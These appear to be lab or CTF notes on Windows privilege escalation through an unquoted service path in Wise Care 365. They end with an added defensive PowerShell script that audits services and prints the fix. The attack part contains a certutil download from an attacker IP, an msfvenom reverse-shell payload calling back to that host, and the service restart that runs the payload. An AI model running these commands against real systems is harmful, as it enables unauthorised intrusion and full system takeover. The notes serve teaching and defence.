ls on Windows is dir.
Moving a file to Windows (fetch it from the attacker host with certutil):
certutil.exe -urlcache -f http://192.168.218.128/Wise.exe Wise.exe
Find privesc with winPEAS. The relevant output:
WiseBootAssistant(WiseCleaner.com - Wise Boot Assistant)[C:\Program Files (x86)\Wise\Wise Care 365\BootTime.exe] - Auto - Running - No quotes and Space detected
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Administrators [AllAccess]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\Wise\Wise Care 365 (Administrators [AllAccess])
In order to optimize system performance,Wise Care 365 will calculate your system startup time.
What "No quotes and Space detected" means:
the service binary path is unquoted and contains spaces, so Windows tries each space-delimited prefix of the path in turn (C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\Wise\Wise.exe, ...) until it finds an executable. A Wise.exe placed inside \Wise\ is therefore found before BootTime.exe, so we can put our payload there as Wise.exe!
Creating the msfvenom payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.218.128 LPORT=7777 -f exe > Wise.exe
How do we get it to run as root/admin? The service is Auto-start and we have AllAccess on it, so restart it and the service control manager will resolve the unquoted path again.
Stop the WiseBootAssistant service:
sc stop WiseBootAssistant
Then start it again:
sc start WiseBootAssistant
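Added audit script for the defending side, not from these notes or from winPEAS: it finds every service with an unquoted binary path containing a space, lists the intermediate executables Windows would try first, flags candidates whose parent directory grants write access to broad groups, and prints the sc.exe fix. It assumes an elevated PowerShell session on the host being reviewed; the group list and the GENERIC_ALL/GENERIC_WRITE mask (0x50000000) are my choices.

```powershell
# Added audit example (not part of the original notes). Run elevated.
$broadGroups = 'Everyone', 'BUILTIN\Users',
               'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
$writeMask   = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                     [System.Security.AccessControl.FileSystemRights]::Modify -bor
                     [System.Security.AccessControl.FileSystemRights]::FullControl)
$genericMask = 0x50000000   # GENERIC_ALL | GENERIC_WRITE, not mapped by the enum

function Get-UnquotedServicePath {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $raw = $svc.PathName
        if (-not $raw -or $raw.StartsWith('"')) { continue }
        # Only the path up to the executable matters; trailing arguments are fine.
        $end = $raw.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
        if ($end -lt 0) { continue }
        $exe  = $raw.Substring(0, $end + 4)
        $rest = $raw.Substring($end + 4)
        if ($exe -notmatch ' ') { continue }

        # Prefixes Windows tries before the real binary: C:\Program.exe, C:\Program Files.exe, ...
        $parts = $exe.Split(' ')
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        # A candidate is risky if its parent directory already exists and a broad
        # group holds an Allow ACE with write, modify, full-control or generic write bits.
        $risky = foreach ($c in $candidates) {
            $dir = Split-Path -Path $c -Parent
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
                $bits = [int]$ace.FileSystemRights
                if ($ace.AccessControlType -eq 'Allow' -and
                    $broadGroups -contains $ace.IdentityReference.Value -and
                    (($bits -band $writeMask) -or ($bits -band $genericMask))) { $c; break }
            }
        }
        [pscustomobject]@{
            Service    = $svc.Name
            StartMode  = $svc.StartMode
            RunAs      = $svc.StartName
            Path       = $exe
            Candidates = $candidates
            Writable   = $risky
            # Remediation: quote the executable path, keep any arguments outside the quotes.
            Fix        = "sc.exe config `"$($svc.Name)`" binPath= `"\`"$exe\`"$rest`""
        }
    }
}

Get-UnquotedServicePath | Format-List
```

Anything with a non-empty Writable field is the case these notes describe; apply the printed Fix and tighten the directory ACL.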